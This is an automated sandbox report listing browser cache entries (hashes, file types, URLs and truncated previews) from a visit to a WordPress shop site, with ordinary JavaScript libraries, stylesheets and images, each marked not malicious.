                                                                        Entropy (8bit):5.1052025431203045
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DBE4B3628220901277C0C4234475E5CB
                                                                        SHA1:C17291130BC11A7F39CE70FE869BF82946E7BE8B
                                                                        SHA-256:10A2CF3D16091FBC89CC987160B62093515CD31F0762A751775999311C7313F4
                                                                        SHA-512:5CB99FFF539C035311BC1D4C6188600F48FE8733034BA4C67C8AFCA0781E4A6CAD38FD3523A85EB2F936D21DC9A94D3653733ECFFE87881B502C447E9303E867
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.6.4
                                                                        Preview:!function(t){var o=function(o,s){var e,i,r=!1,n=!1,a=!1,c={},f={to:"top",offset:0,effectsOffset:0,parent:!1,classes:{sticky:"sticky",stickyActive:"sticky-active",stickyEffects:"sticky-effects",spacer:"sticky-spacer"}},p=function(t,o,s){var e={},i=t[0].style;s.forEach(function(t){e[t]=void 0!==i[t]?i[t]:""}),t.data("css-backup-"+o,e)},l=function(t,o){return t.data("css-backup-"+o)},m=function(){p(e,"unsticky",["position","width","margin-top","margin-bottom","top","bottom"]);var t={position:"fixed",width:u(e,"width"),marginTop:0,marginBottom:0};t[i.to]=i.offset,t["top"===i.to?"bottom":"top"]="",e.css(t).addClass(i.classes.stickyActive)},d=function(){e.css(l(e,"unsticky")).removeClass(i.classes.stickyActive)},u=function(t,o,s){var e=getComputedStyle(t[0]),i=parseFloat(e[o]),r="height"===o?["top","bottom"]:["left","right"],n=[];return"border-box"!==e.boxSizing&&n.push("border","padding"),s&&n.push("margin"),n.forEach(function(t){r.forEach(function(o){i+=parseFloat(e[t+"-"+o])})}),i},y=func

                                                                        Chrome Cache Entry: 377

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 3236 x 1388, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):80326
                                                                        Entropy (8bit):7.390901813388901
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:98998B57EB1F0DE182C02C2E75EFAF64
                                                                        SHA1:F70C279E5D402D390386C6176EE9E565025204F7
                                                                        SHA-256:D5AA63FF567C73262121562408F3EFE1BC90EEB71EE59AE995452B82C7709B86
                                                                        SHA-512:A915F90F3F516631B8EAF7227DD56C6C0CBD9B3CCE40424D8AFA492D8A22E07C22555F6C956FB8DB151C33F0669E58AFF65DE2B765A829D5890303721D8B9868
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR.......l......,......bKGD..............pHYs...#...#.x.?v....tIME..... q.T.. .IDATx....q,G.....z.<......`...@...,...X ..Jx.X ..E[p.0...wH...;.../bc#...sNe..,...............U.P..............!..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@......

                                                                        Chrome Cache Entry: 378

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (952)
                                                                        Category:downloaded
                                                                        Size (bytes):475534
                                                                        Entropy (8bit):4.961773395716967
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:CAF03677E4E61D85CAA208050A2E70F5
                                                                        SHA1:BDA5CC1BC9582E7639EA9BEFDDD746F31AC36383
                                                                        SHA-256:0807F0529B0071D495CC7030F2AB8786FD60DF02BCB0D0FA7E84AC62048D4C8A
                                                                        SHA-512:E62031EF130C3705BA19E558CDA0A22A7DEFB4DF93BD1D770EB73E30BFD8D6039A28291541E48D934AD139253E38E8C1AAFB4189D412952FDFE86FCFC6894B0A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/themes/ciena/assets/css/theme.css?ver=1.0.8
                                                                        Preview:html {. font-size: 1rem;.}../* WordPress Core */.body {. position: relative;. color: #6d6d6d;. font-size: 15px;. line-height: 1.5;. /* Text meant only for screen readers. */.}.body .alignnone {. margin: 5px 20px 20px 0;.}.body .aligncenter, body div.aligncenter {. display: block;. margin: 5px auto 5px auto;.}.body .alignright {. float: right;. margin: 5px 0 20px 20px;. clear: right;.}.body .alignleft {. float: left;. margin: 5px 20px 20px 0;. clear: left;.}.body .wp-caption {. background: #fff;. max-width: 100%;. /* Image does not overflow the content area */. text-align: center;. margin-bottom: 20px;.}.body .wp-caption.alignnone {. margin: 5px 20px 20px 0;.}.body .wp-caption.alignleft {. margin: 5px 20px 20px 0;.}.body .wp-caption.alignright {. margin: 5px 0 20px 20px;.}.body .wp-caption img {. border: 0 none;. height: auto;. margin: 0;. max-width: 100%;. padding: 0;. width: auto;.}.body .wp-caption p.wp-caption-text {. font-size: 11px;. line-height: 17p

                                                                        Chrome Cache Entry: 379

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (15752)
                                                                        Category:dropped
                                                                        Size (bytes):18726
                                                                        Entropy (8bit):4.756109283632968
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B976B651932BFD25B9DDB5B7693D88A7
                                                                        SHA1:7FCB7CB5C11227F9213B1E08A07D0212209E1432
                                                                        SHA-256:4E6CE5444C7F396CEF0EB1FA3611034151E485DD06FBE5573A5583E1EEBC98C3
                                                                        SHA-512:A241EBDCFAF153D5C2A86761145B2575CBE734B4F416ACBFAC082AE5C6EB7C706BD6CA3BC286B7E1A0F9E326729252DCB95B776750C4A3A0D81F2AA6258EA39F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v

                                                                        Chrome Cache Entry: 380

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65493)
                                                                        Category:downloaded
                                                                        Size (bytes):441967
                                                                        Entropy (8bit):4.7268779047052965
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8CFDBF40476C8BB5542E666C770D16CA
                                                                        SHA1:34E1EC7A16C2E08CCCD149430EBA9B39614AB1E0
                                                                        SHA-256:B32F658F5EA9C08F4D3F0D32C2966FCCE6A82914075E507F309C6C6A46EF8FB5
                                                                        SHA-512:06056712DB3D990E91355D3A70C9E6345A15AB85BC5B965AE2ACF451A8A09E31FD94968E21839E1B1EF5F7A0E134D0522E2D4A7981E7D38E1B85C5441B3BD7A6
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.6.4
                                                                        Preview:/*! elementor-pro - v3.6.4 - 15-03-2022 */.@charset "UTF-8";.elementor-bg-transform .elementor-bg{will-change:transform}.elementor-bg-transform-zoom-in:hover .elementor-bg,.elementor-bg-transform-zoom-out .elementor-bg{-webkit-transform:scale(1.2);-ms-transform:scale(1.2);transform:scale(1.2)}.elementor-bg-transform-zoom-out:hover .elementor-bg{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}.elementor-bg-transform-move-left .elementor-bg{-webkit-transform:scale(1.2) translateX(8%);-ms-transform:scale(1.2) translateX(8%);transform:scale(1.2) translateX(8%)}.elementor-bg-transform-move-left:hover .elementor-bg,.elementor-bg-transform-move-right .elementor-bg{-webkit-transform:scale(1.2) translateX(-8%);-ms-transform:scale(1.2) translateX(-8%);transform:scale(1.2) translateX(-8%)}.elementor-bg-transform-move-right:hover .elementor-bg{-webkit-transform:scale(1.2) translateX(8%);-ms-transform:scale(1.2) translateX(8%);transform:scale(1.2) translateX(8%)}.elementor-bg-t

                                                                        Chrome Cache Entry: 381

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):682
                                                                        Entropy (8bit):4.708656090317137
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DF70E530BAF673252340B1B3D52C35B3
                                                                        SHA1:939E94E4CA1C36E63A4E72D8F7593CDD484E2FBF
                                                                        SHA-256:8A7849E5A97F3A20743A6A00216377AAEED742AD0F1F651677A16F0EF83D7BC8
                                                                        SHA-512:72CC0E276FD6F6106AABDA034036BAA229A30DE8E50DF4D864ED83C360ECBBA7F52D6FD4E4D4FE400231466C2BB5A2A6E9182FEE07CF61AC308F1F922297BC88
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/image/css/html_types/image.css?ver=3.3.0
                                                                        Preview:.woof_sid_auto_shortcode .woof_container_image{ . .}...woof_sid_auto_shortcode .woof_container_inner_image{. padding: 9px;. background: #fff;. border-radius: 7px;.}..ul.woof_list_image{..}..ul.woof_list_image li {. display: inline-block;. float: none !important;. margin: 0 0 0 0 !important;. padding: 0 !important;.}...woof_image_term {. display: block; .}...woof_image_term.checked, .woof_image_term:hover {. border-color: #292f38 !important;.}...woof_image_checked {. width: 25px;. height: 25px;. background-color: red;. position: absolute;. z-index: 999;. display: none;.}..woof_image_text_term{. text-align: center;.}.

                                                                        Chrome Cache Entry: 386

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (15619)
                                                                        Category:dropped
                                                                        Size (bytes):15810
                                                                        Entropy (8bit):5.096135394077839
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1483B7BED8BACD5317F83F97CCE18DB2
                                                                        SHA1:E309DF3559FA1852BCC3606C402A67314E4A35DF
                                                                        SHA-256:DAD394F2FB64582D2F94F27E16B6A68B3FD63AA58E8A695D115E2ED9C7F84BC3
                                                                        SHA-512:59BA0A4D85D247E5C57748AB05C781340A0B9CD23D91494AA83BEFCB3C87A48EEEBF3F2C17E61D1FD9DA3F5F5E1B7DE67E9CCE1290EADA23AF2A052BBC1328AD
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*! js-Offcanvas - v1.2.11 - 2019-10-16.jQuery Accesible Offcanvas Panels. * https://github.com/vmitsaras/js-offcanvas. * Copyright (c) 2019 Vasileios Mitsaras (@vmitsaras). * MIT License */.!function(a){"use strict";var b=a.utils||{};b.classes={hiddenVisually:"u-hidden-visually",modifier:"--",isActive:"is-active",isClosed:"is-closed",isOpen:"is-open",isClicked:"is-clicked",isAnimating:"is-animating",isVisible:"is-visible",hidden:"u-hidden"},b.keyCodes={BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,RIGHT:39,SPACE:32,TAB:9,UP:38},b.a11yclick=function(a){var c=a.charCode||a.keyCode,d=a.type;return"click"===d||"keydown"===d&&(c===b.keyCodes.SPACE||c===b.keyCodes.ENTER||void 0)},b.a11yclickBind=function(a,c,d){a.on("click."+d+" keydown."+d,function(e){b.a11yclick(e)&&(e.preventDefault(e),c&&"function"==typeof c&&c.call(),a.trigger("clicked."+d))})},b.supportTransition="transition"in document.documentElement.style||"Webk

                                                                        Chrome Cache Entry: 387

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 1 x 1, 8-bit gray+alpha, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):68
                                                                        Entropy (8bit):4.148986922130799
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2A637D3D825673C0E3462FA4ED9A1C5C
                                                                        SHA1:81668D396DA22832D75A986407FF10035E0D5899
                                                                        SHA-256:69539B5B3777CFFDA28A66D7F2AA9B17C91EE1EC8FD50C00C442AF91753A60F7
                                                                        SHA-512:DC7C40381B3D22919E32C1B700CCB77B1B0AEA2690642D01C1AC802561E135C01D5A4D2A0EA18EFC0EC3362E8C549814A10A23563F1F56BD62AEE0CED7E2BD99
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR.....................IDAT.Wc``......h&Y.....IEND.B`.

                                                                        Chrome Cache Entry: 389

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (18843)
                                                                        Category:dropped
                                                                        Size (bytes):18878
                                                                        Entropy (8bit):5.200208004249851
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:16699A7F2AEBE8D676042962C3BB5537
                                                                        SHA1:9697E3FE2D92C79DEBD82478603D4B59FC249714
                                                                        SHA-256:5152316FADE8C592FBFD38BC491E059464D967D3D31A582B0C885C0961DEED30
                                                                        SHA-512:49AE27B783F99B50A7FE43F084554EDBC87E430982C736C425FDFC26D1550C19B28C6127D3C8A730A31317ADF90008CFE5DBDDD27ECC6E1096D5520704ED8621
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*! This file is auto-generated */.!function(n,t){var r,e;"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define("underscore",t):(n="undefined"!=typeof globalThis?globalThis:n||self,r=n._,(e=n._=t()).noConflict=function(){return n._=r,e})}(this,function(){var n="1.13.7",t="object"==typeof self&&self.self===self&&self||"object"==typeof global&&global.global===global&&global||Function("return this")()||{},e=Array.prototype,V=Object.prototype,F="undefined"!=typeof Symbol?Symbol.prototype:null,P=e.push,f=e.slice,s=V.toString,q=V.hasOwnProperty,r="undefined"!=typeof ArrayBuffer,u="undefined"!=typeof DataView,U=Array.isArray,W=Object.keys,z=Object.create,L=r&&ArrayBuffer.isView,$=isNaN,C=isFinite,K=!{toString:null}.propertyIsEnumerable("toString"),J=["valueOf","isPrototypeOf","toString","propertyIsEnumerable","hasOwnProperty","toLocaleString"],G=Math.pow(2,53)-1;function l(u,o){return o=null==o?u.length-1:+o,function(){for(var n=M

                                                                        Chrome Cache Entry: 392

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text
                                                                        Category:downloaded
                                                                        Size (bytes):13296
                                                                        Entropy (8bit):4.919865387106982
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4517E63F3C7A15E1696BB38DB75FEA2A
                                                                        SHA1:5B2EAD1123946DE7D8A5786C660DEFCFCE7699B8
                                                                        SHA-256:683C3601C8C673010044E3FBAD99C8DA5741FBF5F2B93C1B647E43AF5222B8CA
                                                                        SHA-512:533727136815331ECE0AE5C72CD572A0494BF2FD901803A27489FA3C8CB477C7225AEA8C06C82907841F29CBA3F116C7AE58E781FB7D4FCADE9A1B45F7DD9195
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/css/ion.rangeSlider.css?ver=3.3.0
                                                                        Preview:/**.Ion.RangeSlider, 2.3.1.. Denis Ineshin, 2010 - 2019, IonDen.com.Build date: 2019-12-19 16:51:02.*/..irs {. position: relative;. display: block;. -webkit-touch-callout: none;. -webkit-user-select: none;. -khtml-user-select: none;. -moz-user-select: none;. -ms-user-select: none;. user-select: none;. font-size: 12px;. font-family: Arial, sans-serif;.}..irs-line {. position: relative;. display: block;. overflow: hidden;. outline: none !important;.}..irs-bar {. position: absolute;. display: block;. left: 0;. width: 0;.}..irs-shadow {. position: absolute;. display: none;. left: 0;. width: 0;.}..irs-handle {. position: absolute;. display: block;. box-sizing: border-box;. cursor: default;. z-index: 1;.}..irs-handle.type_last {. z-index: 2;.}..irs-min,..irs-max {. position: absolute;. display: block;. cursor: default;.}..irs-min {. left: 0;.}..irs-max {. right: 0;.}..irs-from,..irs-to,..irs-single {. position: absolute;. display: block;. top: 0;. left:

                                                                        Chrome Cache Entry: 393

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (34810), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):34810
                                                                        Entropy (8bit):4.6370664585525265
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C5147D091F6815E5BE3BD0F41172F598
                                                                        SHA1:4F393A8FD72BDC2117D852AEF45F3D44961089FF
                                                                        SHA-256:8ACE84D8E9B1045932E9609DDA96CAC49A1C3A6ACBF70AC00F8DDD022F6A326D
                                                                        SHA-512:3BBD8F277DB6FF64547EC0AF02A1DA6308AE1CBFE4436D85F88FB7DBB46C435740F7377D4B79E33778348F800BF02A88B6337287BFB40AF1DF5D76B38928BEA4
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/themes/ciena/assets/css/customize.css?ver=1.0.8
                                                                        Preview:body{font-family: Mulish;font-weight: 400;font-size: 16px;line-height: 24px;letter-spacing: 0px;font-style: normal;font-weight: 400;font-style: normal;}body {color:#6d6d6d;}body button.close svg { fill: #6d6d6d;}h1, .h1{font-family: Mulish;font-weight: 400;font-size: 2.5rem;line-height: 1.5;letter-spacing: 0px;text-transform: none;font-style: normal;font-weight: 400;font-style: normal;}h1, .h1 {color:#000000;}h1, .h1 button.close svg { fill: #000000;}h1 svg.stroke, .h1 svg.stroke{stroke:#000000;}h1 svg.fill, .h1 svg.fill{fill:#000000;}h2, .h2{font-family: Mulish;font-weight: 400;font-size: 2rem;line-height: 1.5;letter-spacing: 0px;text-transform: none;font-style: normal;font-weight: 400;font-style: normal;}h2, .h2 {color:#000000;}h2, .h2 button.close svg { fill: #000000;}h2 svg.stroke, .h2 svg.stroke{stroke:#000000;}h2 svg.fill, .h2 svg.fill{fill:#000000;}h3, .h3{font-family: Mulish;font-weight: 400;font-size: 1.75rem;line-height: 1.5;letter-spacing: 0px;text-transform: none;font-style

                                                                        Chrome Cache Entry: 396

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1224x1728, components 3
                                                                        Category:downloaded
                                                                        Size (bytes):246541
                                                                        Entropy (8bit):7.973655222882582
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:509D83CFDE8235795E8CEB6DE411504B
                                                                        SHA1:A5780FA5F5790F2927A51E2CBCADE8408F58F158
                                                                        SHA-256:4FCFD63169DB70C210723F4CBDDB2B22FF2CF376783B2A84CA0CA8705632CE14
                                                                        SHA-512:F0FA2566B6BEB5CF814876C0BA79F3C379F608E0F61D7C3BE8AD628AC89E7FE41E2B641378051A9748196048A911DD59610FB02DE9270890A8A7A712EF65FF6F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/uploads/2022/10/SLIDER-HOME-AVmob.jpg
                                                                        Preview:......JFIF..............Exif..II*.................http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A4AE2121500111ED985FFC254E022163" xmpMM:InstanceID="xmp.iid:A4AE2120500111ED985FFC254E022163" xmp:CreatorTool="Adobe Photoshop 2022 Windows"> <xmpMM:DerivedFrom stRef:instanceID="D54CF9080B66A8E3C4F5D5E20E8D9D7A" stRef:documentID="D54CF9080B66A8E3C4F5D5E20E8D9D7A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......

                                                                        Chrome Cache Entry: 398

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2464), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):2464
                                                                        Entropy (8bit):4.7583405079454115
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FCD267D053339C17EFB525149FF4630E
                                                                        SHA1:F6F93B89804CC4283CB560A50F1E7AB6D2B1010A
                                                                        SHA-256:0F2F31216726DB1E48290822582C309027C5977142EC44AEAD68D3588B196A85
                                                                        SHA-512:4F1E92305E1039186B42A72732A5FEA77D737E4E3B6B2D8DB6C0B93C4E329D835B6D80E1DEF07A616A3721F29325A7A1EF10A3CFD0423EC38BC638519AB2E695
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/uploads/elementor/css/post-8052462574847.css?ver=1725434764
                                                                        Preview:.elementor-8052462574847 .elementor-element.elementor-element-7b44cb4 > .elementor-container{max-width:900px;}.elementor-8052462574847 .elementor-element.elementor-element-7b44cb4:not(.elementor-motion-effects-element-type-background), .elementor-8052462574847 .elementor-element.elementor-element-7b44cb4 > .elementor-motion-effects-container > .elementor-motion-effects-layer{background-color:#FFFFFF0A;}.elementor-8052462574847 .elementor-element.elementor-element-7b44cb4{transition:background 0.3s, border 0.3s, border-radius 0.3s, box-shadow 0.3s;padding:3% 3% 3% 3%;}.elementor-8052462574847 .elementor-element.elementor-element-7b44cb4 > .elementor-background-overlay{transition:background 0.3s, border-radius 0.3s, opacity 0.3s;}.elementor-8052462574847 .elementor-element.elementor-element-3c2fdab{text-align:center;}.elementor-8052462574847 .elementor-element.elementor-element-4679a28{text-align:left;}.elementor-8052462574847 .elementor-element.elementor-element-4679a28 .elementor-headi

                                                                        Chrome Cache Entry: 401

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2530)
                                                                        Category:downloaded
                                                                        Size (bytes):223508
                                                                        Entropy (8bit):5.553241637153081
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E547E79CE65D0801E141230636DB2DCB
                                                                        SHA1:10986297683F59CA236CEDFEDD8FB440B1ED9371
                                                                        SHA-256:4F15694D0B7E225980CFC78A3E44A76D37C2BDB0CE01CDE278D3CFFF32C630AB
                                                                        SHA-512:57F474903F5F60DA71B0475050C17F59E989E4EC88554C237D847F06942336C9815814A1D0C37702E8FEF23B6DC947564502E5A6E213E9CE46EA445B083BD7C3
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://www.googletagmanager.com/gtm.js?id=GTM-K268W3Z
                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__e"},{"function":"__c","vtp_value":"G-2LEWGZ9NK3"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.affiliation"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.value"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.tax"},{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"ecommerce"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.transaction_id"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.shipping"},{"function":"__jsm","vtp_javascript":["template","(function(){var a=",

                                                                        Chrome Cache Entry: 402

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (64065)
                                                                        Category:dropped
                                                                        Size (bytes):74131
                                                                        Entropy (8bit):5.302888336520099
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2AEB34B78FC3FB4FF7ED2CE4934169B0
                                                                        SHA1:2E034A7F0D0DABD31467A8312C7EE85CAD3E4FF2
                                                                        SHA-256:738B1C2950FC6B172FBDAC8007E29EBD840552030251DC7E233F4AF794AA9960
                                                                        SHA-512:334DB8CA5B29D2F58E21630B1E3A7ADF0FEAA6DA942E854100117A36678C1E1919701ADF7200C96DB602B2B4A5569285109C66A5EB810B946C136FB0BCF6DDA2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*!. * Select2 4.0.3. * https://select2.github.io. *. * Released under the MIT license. * https://github.com/select2/select2/blob/master/LICENSE.md. */.!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?e(require("jquery")):e(jQuery)}(function(t){var e,n,d,s,r,p,h,f,g,m,y,i,o,v,a=((u=t&&t.fn&&t.fn.select2&&t.fn.select2.amd?t.fn.select2.amd:u)&&u.requirejs||(u?n=u:u={},f={},g={},m={},y={},i=Object.prototype.hasOwnProperty,o=[].slice,v=/\.js$/,p=function(e,t){var n,i,o=c(e),s=o[0];return e=o[1],s&&(n=b(s=l(s,t))),s?e=n&&n.normalize?n.normalize(e,(i=t,function(e){return l(e,i)})):l(e,t):(s=(o=c(e=l(e,t)))[0],e=o[1],s&&(n=b(s))),{f:s?s+"!"+e:e,n:e,pr:s,p:n}},h={require:function(e){return w(e)},exports:function(e){var t=f[e];return void 0!==t?t:f[e]={}},module:function(e){return{id:e,uri:"",exports:f[e],config:(t=e,function(){return m&&m.config&&m.config[t]||{}})};var t}},s=function(e,t,n,i){var o,s,r,a,l,c=[],u=typeof n;if(i=i||e,"undefined"==u

                                                                        Chrome Cache Entry: 403

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (4933), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):4933
                                                                        Entropy (8bit):4.903210630269961
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E372DF47BD19E1563B557D7BDB817188
                                                                        SHA1:4EFDF4050A78BDBD88AA255955B7423105895DD0
                                                                        SHA-256:4B7693154069C53A16468D09D89C9EBA5DA6C0DFC69CF4D7EB675E32BA663361
                                                                        SHA-512:38BC75BF085413258BB8929641980CFAC58A4792D70EDCD409938B195ADD3C2C78862D90622132E21B364F862E2DEFD7C879B81F96D6608F448DA4C2628DFF0E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors-style.css?ver=7.6.2
                                                                        Preview:.components-custom-select-control{position:relative}.components-custom-select-control__label{display:block;margin-bottom:8px}.components-custom-select-control__button{border:1px solid #757575;border-radius:2px;min-height:30px;min-width:130px;position:relative;text-align:left}.components-custom-select-control__button.components-custom-select-control__button{padding-right:24px}.components-custom-select-control__button:focus:not(:disabled){border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 1px var(--wp-admin-theme-color)}.components-custom-select-control__button .components-custom-select-control__button-icon{height:100%;padding:0;position:absolute;right:0;top:0}.components-custom-select-control__menu{border:1px solid #1e1e1e;background-color:#fff;border-radius:2px;outline:none;transition:none;max-height:400px;min-width:100%;overflow:auto;padding:0;position:absolute;z-index:1000000}.components-custom-select-control__menu[aria-hidden=true]{display:none}.components-custom-select-contr

                                                                        Chrome Cache Entry: 404

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2139), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):2139
                                                                        Entropy (8bit):4.957392272918885
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B72C1CBB1530A011A27BD9800F26765A
                                                                        SHA1:27B825C5D8255F33B8427A059D4545EBD65E1746
                                                                        SHA-256:A256FCCECAC3B32AB73C91D79A18747519A1A18023BE05465C933B03523A82E8
                                                                        SHA-512:63FEBB24BDB65C39ACC8D355DC5B20D3A1AD94AFC347AB2936C543D8B7A911C2F6D2C1C0146707CDB29BEA85A8F34E7FB6E76AAEE4BC0BEA212EA58835A58025
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=6.6.1
